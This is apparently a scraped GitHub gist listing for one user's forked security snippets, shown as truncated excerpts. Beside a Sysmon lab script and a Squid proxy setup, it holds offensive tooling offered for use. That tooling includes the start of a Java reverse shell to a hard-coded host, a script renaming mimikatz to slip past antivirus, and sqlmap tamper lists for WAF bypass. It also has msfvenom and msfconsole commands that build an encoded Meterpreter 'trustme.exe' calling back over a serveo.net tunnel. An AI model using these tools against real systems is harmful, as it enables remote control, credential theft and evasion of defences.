This tutorial is for Ubuntu & Squid3. Use AWS, Google cloud, Digital Ocean or any services with Ubuntu to follow this tutorial.
sudo apt-get update -y
sudo apt-get install squid3 -y
sudo apt-get install apache2-utils -y
faisalfs10x
/ Sysmon_Lab.ps1
Created
May 12, 2023 14:26
— forked from Purp1eW0lf/Sysmon_Lab.ps1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| Meta | |
| Date: 2022 March 28th | |
| Authors: Dray Agha (Twitter @purp1ew0lf) | |
| Company: Huntress Labs | |
| Purpose: Automate setting up Sysmon and pulling Ippsec's sysmon IoC streamliner. Great for malware lab. | |
| #> | |
| function admin_check{ | |
| if (-NOT ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole(` |
faisalfs10x
/ generate-nric.py
Created
April 15, 2023 06:52
— forked from RamadhanAmizudin/generate-nric.py
Malaysian's Identification Number Generation Tool
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # | |
| # Malaysian's Identification Number Generation Tool. | |
| # Copyright (C) 2022 | |
| # | |
| # MIT License | |
| # | |
| import argparse | |
| from datetime import date, timedelta |
faisalfs10x
/ adidns_records.py
Last active
October 6, 2022 09:39
— forked from 3xocyte/adidns_records.py
get /etc/hosts entries from ADIDNS - port to py3
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import argparse | |
| import sys | |
| import binascii | |
| import socket | |
| import re | |
| from ldap3 import Server, Connection, NTLM, ALL, SUBTREE, ALL_ATTRIBUTES | |
| # get /etc/hosts entries for domain-joined computers from A and AAAA records (via LDAP/ADIDNS) (@3xocyte) |
faisalfs10x
/ PowerView-3.0-tricks.ps1
Created
June 27, 2022 04:30
— forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
| # tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
| # the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
| # https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
| # New function naming schema: | |
| # Verbs: | |
| # Get : retrieve full raw data sets | |
| # Find : ‘find’ specific data entries in a data set |
faisalfs10x
/ C.java
Created
December 14, 2021 09:02
— forked from caseydunham/C.java
Java Reverse Shell
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Not sure where I originally got this from. | |
| import java.io.IOException; | |
| import java.io.InputStream; | |
| import java.io.OutputStream; | |
| import java.net.Socket; | |
| public class C { | |
| public C() throws Exception { | |
| String host="10.0.0.90"; |
faisalfs10x
/ squid_proxy_tutorial.md
Last active
October 21, 2021 14:44
— forked from jackblk/squid_proxy_tutorial.md
Tutorial on how to setup a squid proxy with authentication.
faisalfs10x
/ mimikatz_obfuscator.sh
Created
April 18, 2021 15:13
— forked from S3cur3Th1sSh1t/mimikatz_obfuscator.sh
Mimikatz Obfuscator
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # This script downloads and slightly "obfuscates" the mimikatz project. | |
| # Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "[email protected]" ..., | |
| # so removing them from the project before compiling gets us past most of the AV solutions. | |
| # We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ...., | |
| # but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program. | |
| git clone https://github.com/gentilkiwi/mimikatz.git windows | |
| mv windows/mimikatz windows/candycrush | |
| find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/candycrush/g' | |
| find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/CANDYCRUSH/g' |
faisalfs10x
/ sqlmap tamper scripts
Last active
March 30, 2021 05:37
— forked from sdcampbell/sqlmap tamper scripts
sqlmap tamper scripts grouped by DBMSCopied from: https://prakash-khadka.com.np/wp-content/uploads/pdf/www-moonsec-com.pdf
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://medium.com/@drag0n/sqlmap-tamper-scripts-sql-injection-and-waf-bypass-c5a3f5764cb3 | |
| # All scripts | |
| ``` | |
| --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords | |
| ``` | |
| # General scripts | |
| ``` | |
| --tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes | |
| ``` |
faisalfs10x
/ sqlmap-tamper-scripts-evaluation.md
Created
February 15, 2021 02:55
— forked from mgeeky/sqlmap-tamper-scripts-evaluation.md
SQLMap Tamper scripts evaluation against F5 Big-IP ASM WAF
The below table represents results of tests launched against F5 Big-IP ASM WAF appliance in it's XX version of YY and ZZ version of XY
Below names are to be passed to the --tamper= parameter of sqlmap.
The column Violation Rating represents most dominant rating of topmost 20 Requests observed by F5 in it's Security>>Event Logs:Application:Requests view.
The scale is 0-5.
faisalfs10x
/ reverse_http_80.md
Created
October 11, 2019 12:14
— forked from pawiromitchel/reverse_http_80.md
Meterpreter over WAN
autossh -R trustme:80:localhost:80 serveo.net
msfvenom --arch x86 --platform windows --payload windows/meterpreter/reverse_http LHOST=trustme.serveo.net LPORT=80 --bad-chars “\x00” --encoder x86/shikata_ga_nai --format exe --out $PWD/trustme.exe
msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_http;set LHOST 0.0.0.0;set LPORT 80;run;"
NewerOlder